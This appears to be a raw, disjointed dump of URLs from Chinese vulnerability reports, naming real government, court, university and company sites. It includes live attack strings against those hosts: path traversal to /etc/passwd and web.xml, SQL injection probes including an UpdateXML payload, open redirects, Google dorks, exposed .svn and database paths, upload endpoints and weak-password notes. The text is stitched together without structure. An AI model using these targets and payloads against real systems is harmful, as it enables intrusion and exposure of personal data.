http://www.bjcz.gov.cn:9999/ly/caizheng/test就跳过了密码验证 http://www.cfsfgw.gov.cn http://www.cfsfgw.gov.cn/kqadmin/kqindex.aspx 
http://www.hbyl.gov.cn/upload.jsp?name=../viewnew.jsp http://www.hbyl.gov.cn/upload.jsp?name=../index.jsp http://test.crazygame.cn/v2014/forum/forum_cate_list.asp http://www.tongcard.com/embeded/login.do tongcard.com/ROOT/ jar:/opt/tomcatcom/bin/commons-logging-api.jar http://java.sun.com/ http://wanwan.sina.com.cn/smallgame/game_top.php?gid=202205&top=10&type=day http://61.185.224.16/license/license/apply/qsite_siteQuery.do http://snkj.sf.gov.cn/license/license/apply/qsite_siteQuery.do http://www.sjzxc.cn/)管理系统存在弱口令,导致所有学员信息泄露。 http://110.249.129.242/admin/login.aspx http://nx.bbn.com.cn/biz/zbfj2.php?biz_id=436&tag=1&j_id=55 www.firsthospital.cn/upload/photo/1.asp http://kconv3.vasee.com/ http://kconv3.vasee.com/.svn/entries kconv3.vasee.com/withdrawalsManage.jsp http://www.wmtj.mofcom.gov.cn/zdlx/login.html http://www.wmtj.mofcom.gov.cn/zdlx/login_loginform.html http://yfk.mofcom.gov.cn/card/page.html http://www.wmtj.mofcom.gov.cn/zdlx/pages/department/fileshare/ site:www.wmtj.mofcom.gov.cn 
jar:/usr/local/ciecc/webapps/zdlx/WEB-INF/lib/XmlSchema-1.1.jar:/usr/local/ciecc/webapps/zdlx/WEB-INF/lib/activation-1.1.jar:/usr/local/ciecc/webapps/zdlx/WEB-INF/lib/ant-1.6.5.jar:/usr/local/ciecc/webapps/zdlx/WEB-INF/lib/ant-antlr-1.6.5.jar:/usr/local/ciecc/webapps/zdlx/WEB-INF/lib/ant-junit-1.6.5.jar:/usr/local/ciecc/webapps/zdlx/WEB-INF/lib/ant-launcher-1.6.5.jar:/usr/local/ciecc/webapps/zdlx/WEB-INF/lib/antlr-2.7.6.jar:/usr/local/ciecc/webapps/zdlx/WEB-INF/lib/asm-2.1.jar:/usr/local/ciecc/webapps/zdlx/WEB-INF/lib/backport-util-concurrent-3.0.jar:/usr/local/ciecc/webapps/zdlx/WEB-INF/lib/bcprov-jdk15-133.jar:/usr/local/ciecc/webapps/zdlx/WEB-INF/lib/bsf-2.3.0.jar:/usr/local/ciecc/webapps/zdlx/WEB-INF/lib/c3p0-0.8.5.2.jar:/usr/local/ciecc/webapps/zdlx/WEB-INF/lib/cglib-nodep-2.1.jar:/usr/local/ciecc/webapps/zdlx/WEB-INF/lib/cobertura-1.8.jar:/usr/local/ciecc/webapps/zdlx/WEB-INF/lib/cofortune-framework-20120326-dist.jar:/usr/local/ciecc/webapps/zdlx/WEB-INF/lib/commons-beanutils-1.7.0.jar:/usr/local/ciecc/webapps/zdlx/WEB-INF/lib/commons-codec-1.3.jar:/usr/local/ciecc/webapps/zdlx/WEB-INF/lib/commons-collections-3.1.jar:/usr/local/ciecc/webapps/zdlx/WEB-INF/lib/commons-dbcp.jar:/usr/local/ciecc/webapps/zdlx/WEB-INF/lib/commons-digester-1.5.jar:/usr/local/ciecc/webapps/zdlx/WEB-INF/lib/commons-fileupload-1.2.1.jar:/usr/local/ciecc/webapps/zdlx/WEB-INF/lib/commons-httpclient-3.0.jar:/usr/local/ciecc/webapps/zdlx/WEB-INF/lib/commons-io-1.4.jar:/usr/local/ciecc/webapps/zdlx/WEB-INF/lib/commons-jexl-2.1.1.jar:/usr/local/ciecc/webapps/zdlx/WEB-INF/lib/commons-lang-2.3.jar:/usr/local/ciecc/webapps/zdlx/WEB-INF/lib/commons-logging-1.0.4.jar:/usr/local/ciecc/webapps/zdlx/WEB-INF/lib/commons-pool-1.3.jar:/usr/local/ciecc/webapps/zdlx/WEB-INF/lib/dom4j-1.6.1.jar:/usr/local/ciecc/webapps/zdlx/WEB-INF/lib/dwr-2.0.rc4a.jar:/usr/local/ciecc/webapps/zdlx/WEB-INF/lib/ehcache-1.1.jar:/usr/local/ciecc/webapps/zdlx/WEB-INF/lib/ejb3-persistence.jar:/usr/local/ciecc/webapps/zdlx/WEB-I
NF/lib/emory-util-all.jar:/usr/local/ciecc/webapps/zdlx/WEB-INF/lib/ezmorph-1.0.4.jar:/usr/local/ciecc/webapps/zdlx/WEB-INF/lib/freemarker-2.3.2.jar:/usr/local/ciecc/webapps/zdlx/WEB-INF/lib/freemarker.jar:/usr/local/ciecc/webapps/zdlx/WEB-INF/lib/hibernate-annotations.jar:/usr/local/ciecc/webapps/zdlx/WEB-INF/lib/hibernate-commons-annotations.jar:/usr/local/ciecc/webapps/zdlx/WEB-INF/lib/hibernate-search.jar:/usr/local/ciecc/webapps/zdlx/WEB-INF/lib/hibernate-validator.jar:/usr/local/ciecc/webapps/zdlx/WEB-INF/lib/hibernate3.jar:/usr/local/ciecc/webapps/zdlx/WEB-INF/lib/hivemind-1.1.1.jar:/usr/local/ciecc/webapps/zdlx/WEB-INF/lib/hivemind-lib-1.1.1.jar:/usr/local/ciecc/webapps/zdlx/WEB-INF/lib/itext-2.0.1.jar:/usr/local/ciecc/webapps/zdlx/WEB-INF/lib/javamail-1.3.2.jar:/usr/local/ciecc/webapps/zdlx/WEB-INF/lib/javassist-3.4.ga.jar:/usr/local/ciecc/webapps/zdlx/WEB-INF/lib/jaxb-api-2.0.jar:/usr/local/ciecc/webapps/zdlx/WEB-INF/lib/jaxb-impl-2.0.1.jar:/usr/local/ciecc/webapps/zdlx/WEB-INF/lib/jaxb-xjc-2.0.1.jar:/usr/local/ciecc/webapps/zdlx/WEB-INF/lib/jaxen-1.1-beta-6.jar:/usr/local/ciecc/webapps/zdlx/WEB-INF/lib/jaxen-1.1-beta-9.jar:/usr/local/ciecc/webapps/zdlx/WEB-INF/lib/jaxws-api-2.0.jar:/usr/local/ciecc/webapps/zdlx/WEB-INF/lib/jcommon-1.0.9.jar:/usr/local/ciecc/webapps/zdlx/WEB-INF/lib/jdbc2_0-stdext.jar:/usr/local/ciecc/webapps/zdlx/WEB-INF/lib/jdom-1.0.jar:/usr/local/ciecc/webapps/zdlx/WEB-INF/lib/jfreechart-1.0.5-experimental.jar:/usr/local/ciecc/webapps/zdlx/WEB-INF/lib/jfreechart-1.0.5-swt.jar:/usr/local/ciecc/webapps/zdlx/WEB-INF/lib/jfreechart-1.0.5.jar:/usr/local/ciecc/webapps/zdlx/WEB-INF/lib/json-lib-2.4-jdk15.jar:/usr/local/ciecc/webapps/zdlx/WEB-INF/lib/jsr173_api-1.0.jar:/usr/local/ciecc/webapps/zdlx/WEB-INF/lib/jstl.jar:/usr/local/ciecc/webapps/zdlx/WEB-INF/lib/jta.jar:/usr/local/ciecc/webapps/zdlx/WEB-INF/lib/jtds-0.7.1.jar:/usr/local/ciecc/webapps/zdlx/WEB-INF/lib/junit-3.8.1.jar:/usr/local/ciecc/webapps/zdlx/WEB-INF/lib/jxl.jar:/usr/local/cie
cc/webapps/zdlx/WEB-INF/lib/jxls-core-1.0.jar:/usr/local/ciecc/webapps/zdlx/WEB-INF/lib/jxls-reader-1.0.jar:/usr/local/ciecc/webapps/zdlx/WEB-INF/lib/log4j-1.2.9.jar:/usr/local/ciecc/webapps/zdlx/WEB-INF/lib/lucene-analyzers-2.3.0.jar:/usr/local/ciecc/webapps/zdlx/WEB-INF/lib/lucene-core-2.3.0.jar:/usr/local/ciecc/webapps/zdlx/WEB-INF/lib/lucene-highlighter-2.3.0.jar:/usr/local/ciecc/webapps/zdlx/WEB-INF/lib/mysql-connector-java-3.1.7-bin.jar:/usr/local/ciecc/webapps/zdlx/WEB-INF/lib/nekohtml-0.9.5.jar:/usr/local/ciecc/webapps/zdlx/WEB-INF/lib/nekohtml.jar:/usr/local/ciecc/webapps/zdlx/WEB-INF/lib/ognl-2.7.1.jar:/usr/local/ciecc/webapps/zdlx/WEB-INF/lib/ojdbc14.jar:/usr/local/ciecc/webapps/zdlx/WEB-INF/lib/opensaml-1.0.1.jar:/usr/local/ciecc/webapps/zdlx/WEB-INF/lib/org.mortbay.jetty.jar:/usr/local/ciecc/webapps/zdlx/WEB-INF/lib/oro-2.0.8.jar:/usr/local/ciecc/webapps/zdlx/WEB-INF/lib/oscache-2.3.jar:/usr/local/ciecc/webapps/zdlx/WEB-INF/lib/pinyin4j-2.5.0.jar:/usr/local/ciecc/webapps/zdlx/WEB-INF/lib/poi-3.7-20101029.jar:/usr/local/ciecc/webapps/zdlx/WEB-INF/lib/poi-contrib-3.2-FINAL-20081019.jar:/usr/local/ciecc/webapps/zdlx/WEB-INF/lib/poi-ooxml-3.7-20101029.jar:/usr/local/ciecc/webapps/zdlx/WEB-INF/lib/poi-ooxml-schemas-3.7-20101029.jar:/usr/local/ciecc/webapps/zdlx/WEB-INF/lib/poi-scratchpad-3.7-20101029.jar:/usr/local/ciecc/webapps/zdlx/WEB-INF/lib/portlet-api-1.0.jar:/usr/local/ciecc/webapps/zdlx/WEB-INF/lib/quartz-1.5.2.jar:/usr/local/ciecc/webapps/zdlx/WEB-INF/lib/saaj-api-1.3.jar:/usr/local/ciecc/webapps/zdlx/WEB-INF/lib/saaj-impl-1.3.jar:/usr/local/ciecc/webapps/zdlx/WEB-INF/lib/saxpath-1.0-FCS.jar:/usr/local/ciecc/webapps/zdlx/WEB-INF/lib/serializer.jar:/usr/local/ciecc/webapps/zdlx/WEB-INF/lib/slf4j-api-1.6.1.jar:/usr/local/ciecc/webapps/zdlx/WEB-INF/lib/slf4j-simple-1.6.1.jar:/usr/local/ciecc/webapps/zdlx/WEB-INF/lib/spring.jar:/usr/local/ciecc/webapps/zdlx/WEB-INF/lib/standard.jar:/usr/local/ciecc/webapps/zdlx/WEB-INF/lib/stax-api-1.0.1.jar:/usr/local/
ciecc/webapps/zdlx/WEB-INF/lib/stax-utils-20040917.jar:/usr/local/ciecc/webapps/zdlx/WEB-INF/lib/swtgraphics2d.jar:/usr/local/ciecc/webapps/zdlx/WEB-INF/lib/tapestry-4.1.3.jar:/usr/local/ciecc/webapps/zdlx/WEB-INF/lib/tapestry-annotations-4.1.3.jar:/usr/local/ciecc/webapps/zdlx/WEB-INF/lib/tapestry-contrib-4.1.3.jar:/usr/local/ciecc/webapps/zdlx/WEB-INF/lib/tapestry-spring-1.0.0.jar:/usr/local/ciecc/webapps/zdlx/WEB-INF/lib/uuid.jar:/usr/local/ciecc/webapps/zdlx/WEB-INF/lib/wsdl4j-1.6.1.jar:/usr/local/ciecc/webapps/zdlx/WEB-INF/lib/wss4j-1.5.1.jar:/usr/local/ciecc/webapps/zdlx/WEB-INF/lib/wstx-asl-3.2.0.jar:/usr/local/ciecc/webapps/zdlx/WEB-INF/lib/xmemcached-1.3.8.jar:/usr/local/apache-tomcat-zdlx/lib/:/usr/local/apache-tomcat-zdlx/lib/tomcat-i18n-ja.jar:/usr/local/apache-tomcat-zdlx/lib/tomcat-i18n-fr.jar:/usr/local/apache-tomcat-zdlx/lib/catalina-ha.jar:/usr/local/apache-tomcat-zdlx/lib/jasper.jar:/usr/local/apache-tomcat-zdlx/lib/tomcat-i18n-es.jar:/usr/local/apache-tomcat-zdlx/lib/catalina.jar:/usr/local/apache-tomcat-zdlx/lib/tomcat-dbcp.jar:/usr/local/apache-tomcat-zdlx/lib/catalina-tribes.jar:/usr/local/apache-tomcat-zdlx/lib/catalina-ant.jar:/usr/local/apache-tomcat-zdlx/lib/jsp-api.jar:/usr/local/apache-tomcat-zdlx/lib/jasper-el.jar:/usr/local/apache-tomcat-zdlx/lib/ecj-3.7.jar:/usr/local/apache-tomcat-zdlx/lib/annotations-api.jar:/usr/local/apache-tomcat-zdlx/lib/el-api.jar:/usr/local/apache-tomcat-zdlx/lib/tomcat-coyote.jar:/usr/local/apache-tomcat-zdlx/lib/servlet-api.jar:/usr/local/apache-tomcat-zdlx/bin/bootstrap.jar:/usr/java/jdk1.6.0_26/jre/lib/ext/sunpkcs11.jar:/usr/java/jdk1.6.0_26/jre/lib/ext/sunjce_provider.jar:/usr/java/jdk1.6.0_26/jre/lib/ext/dnsns.jar:/usr/java/jdk1.6.0_26/jre/lib/ext/localedata.jar http://www.hnnkyy.com/zjia/zjia-cha2.php?id=1324 http://www.taobao.com/go/app/tmall/login-api2.php.php http://www.zdvictory.com/ http://stats.add.sogou-inc.com/monitor/ http://stats.add.sogou-inc.com/inc/ http://stats.add.sogou-inc.com/src/ 
http://stats.add.sogou-inc.com/libs/ http://www.lqzjz.com.cn/download.jsp?path=../WEB-INF/web.xml http://www.lqzjz.com.cn/houtai/main.jsp http://www.lqzjz.com.cn/houtai/masterfujian.jsp?rowno=643 http://www.lqzjz.com.cn/houtai/uploadfujian.jsp?formid=null&rowid=643 http://www.lqzjz.com.cn/download.jsp?path=../download.jsp https://159.226.110.180/ http://192.168.100.1/xwxx/mailc.htm) http://192.168.100.1/xwxx/dhhm.mht) cyepb.gov.cn/Manage/Login.aspx http://news.uibe.edu.cn/uibenews/10_sort.php?sortid=659 http://dx.uibe.edu.cn/list_new.asp?bid=120&id=79 http://www.shangzhi.gov.cn/ http://www.shangzhi.gov.cn/women/content.php?id=116 http://www.whjz.org.cn/Foosun_Data/FS400.mdb http://115.182.53.90:8899/view/user/loginui.action http://www.***ng.com/ http://115.182.53.128:8001/default.aspx http://codetank.alloyteam.com/ http://bbs.qibosoft.com/read-forum-tid-422299-fpage-0-page-1.htm http://www.xiao5u.com/ http://www.xiao5u.com/Product/Survey.html http://exam2.timber2005.com/WEB/Answer_Info.aspx?infoid=1 http://exam2.timber2005.com/web/News_Info.aspx?infoid=1 http://exam2.timber2005.com/web/Search_List.aspx?search= http://exam2.timber2005.com/web/User_Sort_List.aspx?infoid=73 http://exam2.timber2005.com/WEB/Record_Query.aspx?typeid=1 http://exam2.timber2005.com/WEB/News_Query.aspx?typeid=3 http://exam2.timber2005.com/web/Question_Collect_Info.aspx?infoid=4 http://exam2.timber2005.com/web/Question_Collect_List.aspx?subtypeid=17&typeid=17 http://www.timber2005.com/Customer.html http://px3.timber2005.com/System/Stu_User_Regist.aspx http://sgbbs.pps.tv/forum.php http://pantosoft.com/pantoxfz http://www.hyxzfw.gov.cn/new_read.asp?id=3296 http://192.168.1.1/status.asp) http://192.168.1.1/diagnosis.asp) http://192.168.1.1/status.asp http://192.168.1.1/diagnosis.asp http://125.39.193.212:8081/ http://222.184.252.158:9080/riseapprove_web/secondPage/bur http://lib.znufe.edu.cn/Serverce.asp?id=4 http://2011auto.pps.tv/fun.html http://huati.weibo.com/?from=102&topnav=1&hot=1&wvr=5 
inurL:id= http://www.xieyudatea.com http://www.xmbsl.com http://www.jinhuigk.com http://dlky.cc http://www.fzdxy.com http://www.fjchem.org http://www.hftex.com http://www.han-mei.cn http://www.leyton.cn http://www.mkky.cn http://www.biaodianxm.com http://www.fjhsws.cn http://www.zddg.com http://www.kingschina.com http://www.king-max.cn http://www.xmpac.cn http://www.xmmfc.com http://www.vacree.com http://www.fuda365.com http://www.leading-ch.com/news_show.aspx?id=14 http://www.zonghengjx.com http://www.hzgraceful.com/news_show.aspx?id=50 http://www.topstar-lace.com http://www.zhongrui.cc http://www.hz-hj.com http://www.young-instruments.com http://www.tdp777.com http://aoxingroup.com http://www.senhe.com http://lesli.com.cn http://www.hz-hj.com http://www.yudaco.cn www.renren.com/autoLogin?r=http://rrenren.com http://rrenren.com还是个黄色网站。。 http://dev.renren.com/website/?widget=followbutton http://widget.renren.com/plugin/followbutton?page_id=601848764&color=0&model=0 width:150px;height:40px http://www.ncuhome.cn/topic/shuquan/wenzhang.aspx?id=27889 http://209.116.186.246/#newwindow=1&q=intitle:%E6%8A%95%E7%A8%BF%E7%B3%BB%E7%BB%9F+%E6%8A%80%E6%9C%AF%E6%94%AF%E6%8C%81%EF%BC%9A%E5%8D%97%E4%BA%AC%E6%9D%B0%E8%AF%BA%E7%80%9A%E8%BD%AF%E4%BB%B6%E7%A7%91%E6%8A%80%E6%9C%89%E9%99%90%E5%85%AC%E5%8F%B8 http://www.cnemergency.com/Web/Login.aspx http://dt.gwpstc.com/esp_msi/admin/login.php http://dt.scsei.org.cn/esp_msi/admin/login.php http://www.ccstzsb.com/esp_msi/admin/login.php http://xx/esp_msi/login/,后台http://xx/esp_msi/admin/ http://xx/esp_msi/jyyjd/ http://www.changyang.jcy.gov.cn/news.asp?partid=12&classid=12&id=577 http://www.tgsqjjjc.gov.cn/article.php?MsgId=92913 http://www.ahbbjjjc.gov.cn/article.php?MsgId=90652 http://www.ahsxjjjc.gov.cn/article.php?MsgId=92980 http://www.yzjjjc.gov.cn/article.php?MsgId=91080 http://www.ahtlxjjjc.gov.cn/article.php?MsgId=84285 http://www.lljcy.gov.cn/jwgk.asp?bianhao=711&Action=show 
http://www.hl.jcy.gov.cn/medialiebiao.aspx?ID=34&mc=%e5%9b%bd%e5%ae%b6%e7%ba%a7%e5%aa%92%e4%bd%93 http://www.hblsjjjc.gov.cn/article.php?MsgId=89375 http://www.fyydjjjc.gov.cn/article.php?MsgId=89759 http://www.fnxjw.gov.cn/article.php?MsgId=92530 http://www.whjjw.gov.cn/article.php?MsgId=92974 http://www.aqthjjjc.gov.cn/article.php?MsgId=91265 http://www.jsjcy.gov.cn/config.asp?id=6 http://www.zhijiang.jcy.gov.cn/html/pic/pic.asp?id=68&classid=46 http://www.zjhn.jcy.gov.cn/shownews.asp?id=2722 http://www.xcxfy.gov.cn/shownews.asp?id=527 http://www.fccourt.gov.cn/commonList.jsp?pxh=1&progbh=01 http://www.hbjjjc.gov.cn/article.php?MsgId=92777 http://www.cpxjw.gov.cn/shownews.asp?id=665&BigClass=%E9%93%9D%E5%9F%8E%E9%A3%8E%E7%BA%AA http://www.yiling.jcy.gov.cn/about.asp?smallclassid=184 http://snjjjc.gov.cn/gg.asp?lm_id=1076 http://www.fyyqjjjc.gov.cn/article.php?MsgId=92591 http://www.shluwan.jcy.gov.cn/news.jsp?chnlid1=137&chnlid2=138 http://www.szsjw.gov.cn/article.php?MsgId=89573 http://www.dyxjjjc.gov.cn/CommonList.asp?cid=60 http://gold.ntzj.gov.cn/page.asp?classid=1 http://shzd.hljcourt.gov.cn/zhuanti/sjt.php?sjt_id=4 http://www.hslz.gov.cn/article.php?MsgId=84768 http://jijian.enping.gov.cn/vcd/playwin.asp?id=33&downid=1 http://www.yxrmfy.gov.cn/list.php?pid=1 http://www.snjjjc.gov.cn/gg.asp?lm_id=1076 http://nti.gov.cn/Info.aspx?SID=201403181036591721 http://www.tljqjw.gov.cn/article.php?MsgId=92792 http://www.ckfy.gov.cn/download.aspx?cid=47&id=518 http://www.cqjcy.gov.cn/toupiao/show.asp?id=6 http://www.grjcy.gov.cn/appAgree.aspx?sid=0503 http://www.qbfy.gov.cn/cpws/content.asp?cpws_id=16 http://www.azqjw.gov.cn/show.asp?newsid=442 http://www.hlsjjjc.gov.cn/comment.asp?classid=1 http://www.jcy.haimen.gov.cn/view.asp?keyno=300 http://www.scxjw.gov.cn/contentview.asp?sortid=2&id=2389 http://www.szzjrmfy.gov.cn/news.php?typeid=159 http://szzjrmfy.gov.cn/news.php?typeid=159 http://www.bsfy.gov.cn/news_more.asp?lm2=155 
http://www.hxjjjc.gov.cn/article.php?MsgId=70313 http://www.wufeng.jcy.gov.cn/lanmu.aspx?colid=1 http://www.ahjjjc.gov.cn/article.php?MsgId=92959 http://www.jyjcy.gov.cn/shownews.asp?id=41 http://408.peugeot.com.cn/show.php?cid=57 http://www1.**.zsks.cn/kscx/ http://www1.**.zsks.cn/kscx/zy/picture.gif?ksh=考生号 http://www1.**.zsks.cn/query/pz14_ksgj.jsp http://www1.**.zsks.cn/query/pz14_kscx.jsp http://rt.openssl.org/ http://125.39.193.225/ http://app.zj165.com/更无聊的尝试弱口令既然进去。里面业务至少影响浙江联通公司上千万用户。这算大隐患? php:670行 http://www.huaue.com/gzxx2014/2014711110557.htm http://moa.xjtu.edu.cn:9083//file/oa@xajt.zip/?filePath=../../etc/passwd text-align:right padding-left:300px text-decoration:none http://3g.169ol.com/wdfsearch.psml http://3g.169ol.com/spbrief.psml?sp_parentcode=06 http://www.haitiansoft.com/ http://121.30.226.44/login.asp http://124.65.69.14/login.asp http://vos.tjufe.edu.cn/login.asp http://211.68.250.42/login.asp http://www.fzsyxx.com/oa/ http://oa.ccib.com.cn/login.asp http://www.cnshuiyu.com/login.asp http://oa.tjfsu.edu.cn/login.asp http://old.mdjagri.gov.cn/oa/login.asp http://60.171.34.204:8086/ http://116.228.82.237/login.asp http://dfoa.shhjwl.com/login.asp http://www.cnshuiyu.com/login.asp http://211.68.192.21/login.asp http://121.30.226.44/login.asp http://180.166.7.94/login.asp http://cqkyoa.oicp.net/login.asp inurl:gov.cn inurl:list.action?channelId http://www.qx.gov.cn/cms/qx/list.action?redirect:http://www.yahoo.com/ www.sxgujiao.gov.cn/gov/gujiao/list.action?redirect:http://www.yahoo.com/ http://www.tyfoa.gov.cn/szf/wqb/list.action?redirect:http://www.yahoo.com/ http://www.hbrq.gov.cn/adm/videolist.php inurl:/news/list.asp?news_id= http://www.time.net.cn/news/list.asp?news_id=112 http://www.time.net.cn/count/ http://www.hedz.gov.cn/news/list.asp?news_id=640 http://www.tc12315.gov.cn/news/list.asp?news_id=1682 www.njgh.gov.cn http://www.taobao.com/go/app/tmall/login-is-api.php http://www.taobao.com/go/app/test/test4444.php inurl:/Web_Org/ 
inurl:Web_Org/Notice_info.aspx?infoid= http://www.zhiyuan-peixun.com/Web_Org/news_info.aspx?infoid=204 http://www.zhiyuan-peixun.com/Web_Org/St_Son_Index.aspx?infoid=4013%27 http://www.zhiyuan-peixun.com/Web_Org/course_info.aspx?infoid=4105%27 http://www.zhiyuan-peixun.com/Web_Org/LiveCourse_info.aspx?infoid=6%27 http://www.zhiyuan-peixun.com/Web_Org/Tch_Info.aspx?infoid=2026%27 http://www.gxkjks.com/Web_Org/Notice_info.aspx?infoid=29 http://www.sqlmap.org www.gxkjks.com\session http://dazoufang.liling.gov.cn/govnews/ly-write.asp http://dazoufang.liling.gov.cn/govnews/ inurl:getclick.jsp?infoid= http://www.c-ncap.org.cn/cms/cms/infopub/getclick.jsp?infoid=1192494709 http://www.sqlmap.org www.c-ncap.org.cn\session http://219.242.65.10/ArticleShow.aspx?SectionId=181b46a7-4342-4daf-94b1 http://www.sqlmap.org inurl:celerityAlleywayDetail.do http://zwdt.tz.gov.cn/riseapprove_web/indexGetDatags.do?depNO=JS061200F http://www.sqlmap.org http://www.hshsh.pudong-edu.sh.cn/be/ber_upload_rank.jsp?direction=0 http://www.sqlmap.org www.hshsh.pudong-edu.sh.cn\session http://yjsc.jzmu.edu.cn/right_js.asp?classid=6 inurl:listkaoshi.asp?shijuanid= http://xitong.mingjuan.net/e-learning/listkaoshi.asp?shijuanid=580 http://www.sqlmap.org inurl:shownews.asp www.musicziko.com www.shengmingchen.com www.mdxkj.com www.cskstdz.com www.wzyfdz.com http://www.vansoon.com/ProductShow.asp?ID=132 http://www.vansoon.com/CompHonorBig.asp?id=29 http://www.yzb.bupt.cn/admin_upload.php?a1=%BF%BC%C9%FA%D2%E2%CF%F2%B1%ED.doc http://www.yzb.bupt.cn/admin_upload.php?a1=../php/student1.php http://www.yzb.bupt.cn/admin_upload.php?a1=../../../../../etc/passwd http://wapzz.cn/admin/Login.aspx http://www.bjcyh.com.cn/ask/tsyj_nr.php?tid=174 http://www.xusoft09.cn/ http://www.top-solution.cn/index.php?op=about&t=28 http://www2.xiaolan.cn/message.php?op=msg_show&id=5111 http://www.dgtxxf.com/main/data.php?id=381&dir_id=0202 http://www.xlgp.gov.cn/web/info/info_show.jsp?record_id=4196 
http://www.zssph.com/json/jlist.php?Si=1 http://www.zssta.org.cn/front/kexie/page_list.jsp?menu_id=38 http://www.zsrd.gov.cn/web/ztx.php?lib_id_more=208&lib_id=206 http://www.zsxlyy.com/index.php?op=news_da&type=21&id=771 http://www.hnkjt.gov.cn/ http://www.zhongke.com//admin/inc/wnews.php?type=1&path=video&form=frmList&formname=img www.huoyan.tv http://218.76.137.44/00/ugc/9/74/9ecbc603bc1c96d8226f265198ef19fc82255b01/9ecbc603bc1c96d8226f265198ef19fc82255b01.pfv http://www.uccb.com.cn/indexpage/more.jsp?postion=046198209&classid=121&newstype=yn http://www.170.com/manager/html/ http://sports.chd.edu.cn/newUI/sort.asp?sortID=7&ASSortID=27 http://sports.chd.edu.cn/newUI/shownews.asp?id=298 http://sports.chd.edu.cn/htmleditor/upload.asp http://shop.gexia.com/siteserver/login.aspx http://job.39.net http://job.39.net/Handler/Job.ashx?fn=JobList&pageno=1 post:workplace=%e9%8d%8f%e3%84%a9%e5%84%b4&RecruitType=10&category=1 http://www.170.com/mallPortal/ajax/item/number/query?ajax=true®ionId=11&phoneTypeId=A01&specialId=5&queryFlag=2&resCode=38&searchKey=1111&maxNum=20&sourceFlag=2 http://www.mysyyh.com/www.mysyyh.com.zip http://www.hangankeji.com/ShowHome.action http://tvs.tcl.com/Admin/TCLService/WebEdior/admin/login.aspx http://multimedia.tcl.com/userfiles/ http://wsxx.cdu.edu.cn/about/About.php?ID=1 http://wsxx.cdu.edu.cn/news/detail.php?ID=2123066389&ClassID=1 http://wsxx.cdu.edu.cn/news/xsgz_detail.php?ID=1883493617&ClassID=12 http://wifi.uzai.com/default.aspx http://wifi.uzai.com/WebResource.axd?d=NwnXfrE_urdm6KDmUSQIw_vuKssg8zTAl01cPwgVKDzsRBdpTJIOOnC9ivVqs-9Lo-OSb5qkR_zND4fgZGf8GCRdWGHVBHbbLfEMVhzyGDQ1 http://www.ruixiaohua.cn/ inurl:xyjs.asp?Txy= inurl:Biogenic.asp?Tbynf= http://www.bjtour.com.cn/searchLines.aspx?LStartDate=1%27 http://www.bjtour.com.cn/searchLines.aspx?sMoney=0&eMoney=100%27 http://www.bjtour.com.cn/searchLines.aspx?days=1%27 http://www.bjtour.com.cn/searchLines.aspx?toAdd=aa%27 http://www.bjtour.com.cn/searchLines.aspx?LStartDate=1 
http://www.sqlmap.org www.bjtour.com.cn\session http://www.fjforestry.gov.cn:38501/Web/Course.aspx?typeid=28 http://www.fjforestry.gov.cn:38501/Web/CourseInfo.aspx?infoid=7 http://www.fjforestry.gov.cn:38501/Web/FCourse.aspx?typeid=32 http://www.fjforestry.gov.cn:38501/Web/FCourseInfo.aspx?infoid=3 http://www.fjforestry.gov.cn:38501/Web/GovQa.aspx?isnu=1 http://www.fjforestry.gov.cn:38501/Web/GovQa_Info.aspx?askid=9 http://www.fjforestry.gov.cn:38501/Web/New.aspx?typeid=4 http://www.fjforestry.gov.cn:38501/Web/Notice.aspx?typeid=2 http://www.fjforestry.gov.cn:38501/Web/New_Info.aspx?infoid=5&type=notice http://www.fjforestry.gov.cn:38501/Web/Together.aspx inurl:tripCity.aspx?cityid= http://www.kouclo.com/usercenter_order/my_order http://www.kouclo.com/usercenter_order/my_order http://cee.xmu.edu.cn/ContentShow.aspx?Id=P1 http://www.changedu.com/ http://sjjx.njit.edu.cn http://math.hit.edu.cn/news.do?cmd=show&id=1234 http://www.wwsjyw.net/admin/admin_login.asp http://www.rwsk.zjut.edu.cn/kycx/kycx.asp?sort_id=1 inurl:vipzjabout.php?id= http://www.xhhouse.net/vipzjabout.php?id=1436741 http://www.zhqfc.cn/vipzjabout.php?id=1450620 http://www.0662f.com/vipzjabout.php?id=1000124 http://www.txfc.net/vipzjabout.php?id=1012863 http://www.cnfczy.com/vipzjabout.php?id=1436228 http://member.aili.com/?c=content&m=index&a=morePic http://member.aili.com/?c=content&m=index&a=moreArc http://www.hbnsyh.com/show.asp?id=573 http://www.nj3000plan.org/ http://www.xnai.edu.cn/libwww/detail.jsp?id=192 http://www.dnion.com/太坑,站点不安全。不过用户较多,测试能破解出若干账号,腾讯只是一例。 http://customer.dnion.com/ http://runreport.dnion.com/ http://pushdx.dnion.com/ http://v.qq.com/ http://v.qq.com/page/q/i/h/q0107vgfzih_0.html http://bbs.kangq.com/config/config.php http://myduty.iflytek.com/Trans/Quaere/Quaere_View.aspx?look=look&QuaereBillId=3452 http://centpm.iflytek.com/Trans/Quaere/Quaere_View.aspx?look=look&QuaereBillId=3372 http://www.ica.org.cn/admin/login.aspx 
http://admin.comic.qq.com/site/getScore?jsonpCallbackParam=initStarSuccessCallback&eid=278%20and%20UpdateXML%281,CONCAT%280x5b,mid%28%28SELECT%20database%28%29%29,1,32%29,0x5d%29,1%29%23&ajax=true&_=1406730256944 http://dati.labs.10086.cn/papersurvey/WebPaper.action http://tieba.baidu.com/p/3197673292?fr_bdps_bottom_login=1&autolike=1 http://rsc.ruc.edu.cn/index.html http://down.qibosoft.com/down.php?v=v7 http://www.papajohnschina.com/online/index.jsp?lang=zh_CN http://www.zhongdongli.com http://ba.hbzj.net/login.aspx http://cs.anjuke.com/agency/store/71851W0QQpZ1QQtabZ0QQp3Z713 http://www.hxu.edu.cn/pages/News/list.php?id=6687&type=%22查询到数据库 http://ac.qq.com/CartoonComment/getCommentList http://home.cq.fang.com/UserFiles/File/logo.aspx http://www.syrcbank.com/bank/category.aspx?item=006001 inurl:info.aspx?Code= http://www.312000.net/admin/index.aspx http://www.dyhospital.com/admin/index.aspx http://www.wlsph.com/admin/index.aspx inurl:info.aspx?Code= http://www.312000.net/admin/dialog/FileList.aspx?code=0&show=true&path=./Admin http://www.dyhospital.com/admin/dialog/FileList.aspx?code=0&show=true&path=./ http://www.wlsph.com/admin/dialog/FileList.aspx?code=0&show=true&path=./Admin/Dialog http://www.312000.net/admin/dialog/fileupload.aspx?type=1&path=./Admin/Dialog http://www.dyhospital.com/admin/dialog/fileupload.aspx?type=1&path=./Admin/Dialog http://www.wlsph.com/admin/dialog/fileupload.aspx?type=1&path=./Admin/Dialog http://agent.xinnet.com 